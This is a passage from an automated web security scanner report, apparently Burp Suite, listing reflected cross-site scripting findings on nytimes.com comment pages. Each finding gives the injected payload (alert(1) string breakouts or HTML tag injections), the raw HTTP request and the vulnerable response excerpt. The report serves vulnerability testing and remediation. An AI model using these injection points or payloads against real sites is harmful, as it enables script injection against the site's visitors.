This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34100
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7 ...[SNIP]...
|
3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d01a6"-alert(1)-"452e5e6ff60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70935
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... al,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142527"; var s_pagename = "2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197c4'-alert(1)-'5a4facb62fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments197c4'-alert(1)-'5a4facb62fc/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 82577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments197c4'-alert(1)-'5a4facb62fc'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70326"><a>8e7c289c36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 82559
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo ...[SNIP]...
|
3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32dbf"><a>d7df2b346ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34488
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink ...[SNIP]...
|
3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64c7c"-alert(1)-"629b7b315c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 80298
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... t"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142517"; var s_pagename = "2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f3f'-alert(1)-'ada34236929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments95f3f'-alert(1)-'ada34236929/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71869
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments95f3f'-alert(1)-'ada34236929'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9161"><a>5ab015563d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71781
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetprom ...[SNIP]...
|
3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71c9"><a>1e34a4fd54a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34447
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLin ...[SNIP]...
|
3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bca7"-alert(1)-"2319875f975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71297
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... "; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142601"; var s_pagename = "2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51860"><a>6eafaae01f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 84159
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S ...[SNIP]...
|
3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc00'-alert(1)-'307dd572ea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments1bc00'-alert(1)-'307dd572ea0/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 84201
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments1bc00'-alert(1)-'307dd572ea0'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a8f"><a>014e8107919 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33806
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom ...[SNIP]...
|
3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f46b3"-alert(1)-"68d72677370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 81567
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... mesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142483"; var s_pagename = "2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4241c'-alert(1)-'33ecf65d4eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments4241c'-alert(1)-'33ecf65d4eb/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 120080
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments4241c'-alert(1)-'33ecf65d4eb'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
